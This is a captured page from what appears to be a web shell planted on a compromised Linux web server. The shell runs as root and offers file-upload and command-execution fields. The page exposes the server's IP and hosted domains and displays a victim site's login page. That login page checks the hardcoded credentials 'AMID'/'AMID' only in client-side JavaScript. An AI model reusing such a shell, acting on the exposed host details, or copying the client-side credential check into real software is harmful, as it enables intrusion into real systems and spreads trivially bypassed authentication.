Uname:Linux woropds 5.15.0-187-generic #197-Ubuntu SMP Fri Jul 17 19:17:01 UTC 2026 x86_64

Base Dir : /var/www/sweetheart.mx/htdocs

User : root


Who Knows WP Shell uploader
Uname:Linux woropds 5.15.0-187-generic #197-Ubuntu SMP Fri Jul 17 19:17:01 UTC 2026 x86_64

403WebShell
403Webshell
Server IP : 216.238.66.20  /  Your IP : 216.73.216.249
Web Server : nginx/1.30.4
System : Linux woropds 5.15.0-187-generic #197-Ubuntu SMP Fri Jul 17 19:17:01 UTC 2026 x86_64
User : root ( 0)
PHP Version : 8.2.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/amid.org.mx/htdocs/Descargas/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/amid.org.mx/htdocs/Descargas/index.html
<html>

<head>
  <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/materialize/1.0.0/css/materialize.min.css">

  <style>
    body {
      min-height: 100vh;
    }

    main {
    }

    body {
      background: #fff;
    }

    .input-field input[type=date]:focus + label,
    .input-field input[type=text]:focus + label,
    .input-field input[type=email]:focus + label,
    .input-field input[type=password]:focus + label {
      color: #e91e63;
    }

    .input-field input[type=date]:focus,
    .input-field input[type=text]:focus,
    .input-field input[type=email]:focus,
    .input-field input[type=password]:focus {
      border-bottom: 2px solid #e91e63;
      box-shadow: none;
    }
  </style>
</head>

<body class="blue darken-4 valign-wrapper ">
  <main style="width: fit-content; margin: auto;" class="center-align">
      <img class="responsive-img" style="max-width: 350px; margin-bottom: 10%" src="logo_amid4.png" /><BR><BR>


      <div class="container" style="min-width: 30vw;">
        <div class="z-depth-1 grey lighten-4 row" style="display: inline-block; padding: 32px 48px 0px 48px; border: 1px solid #EEE; width: 100%">

          <div class="col s12">
            <div class='row'>
              <div class='col s12'>
              </div>
            </div>

            <div class='row'>
              <div class='input-field col s12'>
                <input class='validate' type='text' name='user' id='user' />
                <label for='user'>Usuario</label>
              </div>
            </div>

            <div class='row'>
              <div class='input-field col s12'>
                <input class='validate' type='password' name='password' id='password' />
                <label for='password'>Password</label>
              </div>
            </div>

            <br />
            <center>
              <div class='row'>
                <button id="login" name='btn_login' class='col s12 btn btn-large waves-effect blue darken-4'>Iniciar</button>
              </div>
            </center>
        </div>
        </div>
      </div>
      <a href="#!"></a>

      

    </main>

  <!-- Modal Structure -->
  <div id="modal1" class="modal">
    <div class="modal-content">
      <h4>Panel Principal</h4>
      <p>Lista de Archivos:</p>
    </div>
    <div class="modal-footer">
      <a href="#!" class="modal-close waves-effect waves-green btn-flat">Cerrar</a>
    </div>
  </div>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/materialize/1.0.0/js/materialize.min.js"></script>
  <script>
       document.addEventListener('DOMContentLoaded', function() {
            var btnLogin = document.getElementById("login");

            var elems = document.querySelectorAll('.modal');
            var instances = M.Modal.init(elems,{});

            btnLogin.addEventListener("click",function(){
                var user = document.getElementById("user").value;
                var password = document.getElementById("password").value;

                if( user == ""){
                    M.toast({html: 'Ingrese un usuario'});
                    return;
                }
                if( password == ""){
                    M.toast({html: 'Ingrese un password'});
                    return;
                }
                let opciones = [
                    ["AMID","AMID"]
                ];
                for( combinacion in opciones){
                    if(user == opciones[combinacion][0] && password == opciones[combinacion][1]){
                        instances[0].open();
                        return;
                    }
                }
                
            }.bind(instances))

        });
  </script>
    
</body>

</html>

Youez - 2016 - github.com/yon3zu
LinuXploit